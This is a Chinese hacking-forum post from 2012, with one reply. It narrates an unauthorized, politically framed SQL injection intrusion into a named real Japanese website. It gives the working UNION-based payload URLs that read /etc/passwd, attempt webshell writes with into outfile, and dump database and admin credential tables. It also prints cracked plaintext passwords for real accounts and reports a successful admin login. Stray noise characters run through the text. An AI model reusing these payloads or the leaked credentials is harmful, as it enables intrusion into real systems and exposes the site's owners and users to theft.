中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试
4 M% }& _/ G# U; y
  K% K% c3 I3 \4 k6 s! h$ r' K; R/ ]
0x01. 检测 www.zuaa.jp 收集数据1 R! b) N) k: H1 A* H
[attach]73[/attach]
* S/ N# n  x% ]
9 h2 w8 s; W9 lwhatweb* y2 ^# ]) `) m' x. y0 Y. @
[attach]74[/attach]
4 n1 B$ a6 {" o2 }; p( _9 T# s  f0 Q0 R& y: `0 I$ K0 V. a) J' u
利用NMAP扫描1 O) ~4 ~' n! S& x
[attach]75[/attach]
8 Z5 U! r) G- m* x& w( N% i中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持0 M5 P5 l2 V9 Z9 o
0x02.找注入点- Q* @6 I# `7 p
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
1 E: E& ]: G5 S" H& r$ I3 ?[attach]76[/attach]
* y7 j# s( i0 S4 Y( m1 K1 A2 Y2 {% u. ?2 D) {
0x03.order by
0 |+ a' }+ E1 O( ^             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
( n' F' \4 \* m8 P  W; ~5 a[attach]77[/attach]/ ^0 ]! I) @( U; d8 K
order by 28报错,order by 27正常
/ _/ E8 q. e% S2 f% A, S/ ?" p
. D. N5 d- P4 o  _" S0x04.   union手动查询
( Z0 h1 o5 ?. p* Phttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ! w, x6 H2 m$ T+ r4 R( i1 W
添加到 27 时正常显示   a4 |0 u* f1 @
[attach]78[/attach]
" F0 s) P/ f; @6 v' }中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 w. }9 u1 i: }) r; R) a; ?' K' n
8 U" P5 R2 r8 {; j% G- u
0x05. info:( j- I1 M) [! e+ K
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 * X- z& X/ A- V) `+ T* @; W
[attach]79[/attach]
0 h, e1 \2 Y: ~; e1 }  Muser:            root@localhost
' V& l- [/ X- ndatabase:    openpne4 R- d. ^# T+ S8 d
version:      4.1.22
1 I: B" ]8 M& W4 w3 C- eos:             portbld-freebsd5.45 C: X1 Z) o. y$ G  _
2 U  Z8 }6 B/ i! R
0x06. root用户, U) d1 a+ S$ h9 Y
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)( G; D2 G5 n/ W0 F
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 - T1 ^/ |3 ^; p8 G, |
[attach]80[/attach]* t2 C4 _% Y* R7 z7 a& c. c- E1 A
通过工具转换
0 C- B; \( A4 ?) y[attach]81[/attach]& B/ k& v; i, r- ~: ^( s
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持/ B+ j, J: z' u+ W
- I2 X( T" A1 N& C  V' h! R
0x07. 利用 into outfile& ?' b+ w1 T7 G* r% ?: {+ \  _
全部都失败! `) F, B9 e1 V6 L0 y) c1 L2 I
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php* m+ B3 l8 z  K# ?7 L

; j+ `  c  H# S4 U# }http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 4 N+ O* k, `' r

* U# n' J" \5 ^& c) ]3 p! F页面显示“MDB2 Error:syntax error”4 f9 T0 ]* L2 I: l# D; ?% o
: s. {" J" p4 l5 f+ ^
0x08. 利用 mysql 4.1
/ W9 ^! T. B; I' o% X( F: w猜常规表名,字段未果 工具 sqlmap" Z! L* J; |' M+ Q8 M
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持& D* l3 E4 {! L: X$ k

5 {; h" G! ^8 Z3 ~) Q, Y& q/ ][attach]82[/attach]8 U( g' I# D; d1 @$ ~: _

" ]6 ^9 z3 A8 J' C; n$ C6 l8 r! F0x09. 查找后台( p  Q, }0 U2 A) Y) o8 `
利用 现有的各种 后台工具尝试都不行0 Z: o8 \+ }' p; f1 j( }

% U+ |; o% M5 W0x10.  MySL外联方法
5 s- l4 z* J6 ^# E* v从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行6 l' l9 o; \4 D) m* ?* t4 w: Y
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
- l- F% V# J& {0 S& ^- m6 E6 Ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user* W$ t0 t, v0 y
[attach]83[/attach]
/ [. [! s% G$ {" t8 D# N* T8 ?& c这个可以在 www.cmd5.com 解密0 l: w2 D. [7 r3 E& K) f
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
$ K+ k, H1 ?+ ?* i$ d" Hchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97) `% L4 Y! e: z2 L: ~
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
1 ^! J& A' Y. t3 W9 S) uzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
; |8 {: N8 r+ o& D- b' G4 q4 o3 W, @工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知0 |+ u; S# J3 c# X# c  p
[attach]84[/attach]5 w1 F8 e3 z8 L5 y

" l/ m  B+ W% M2 H' m0x11. 网站突破: F& t: ]8 Y# F
发现网站的源程序 openpne, google 下载 openpne 源码1 K# X0 R) q+ M$ B  |7 ]
[attach]85[/attach]
# Y& U$ }. z2 P$ E; o' n9 M& @" N1 p$ \4 ?5 i+ \1 U8 ?. e! ]$ ]/ u1 c
0x12. 默认信息利用; Q) A, t7 [% z& ?
http://sns.zuaa.jp/?m=admin&a=page_login9 T2 ~9 f) H6 |+ }8 G
[attach]86[/attach]
# A( I6 U4 C" I. ?表名 (c_admin_user) ,字段名(username,password)* N! b; Y* }8 b9 E
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
: q9 }" a& p. i2 c: b[attach]87[/attach]; O( B* F( i* [4 _( A1 I
解密
4 x9 V7 C/ i* B' `; ^zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009! I& _  T' P, {, w7 F: _2 O: r. t0 ?
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
4 y* d( _) k, J6 ^, p- Z
) h, f0 q# r& b! V8 _8 ]中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
: h2 \0 k4 b$ E$ P$ h  ~& A. P# W, Y* H) e) F9 R
0x13. 登录后台1 i6 M9 K! M3 @* ~( y7 D
[attach]88[/attach]/ j8 _* O$ z6 A

. Y6 x7 i5 E6 x8 D# x1 _8 I) B1 W
0 R; N$ J' o5 N, f! |9 Z0x14. 小结2 q8 {- X, q/ b: F9 a* v% s, B
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
( u) b4 E+ W: `6 D- o感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点! w" u. f* }, t: N, c" g# F8 O
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain" h! y+ C/ X( v
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
5 Q* e3 b$ e. [8 |+ N) c
% k5 f; P$ f& P+ K( g最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
9 A; H; I# i4 b7 b
作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2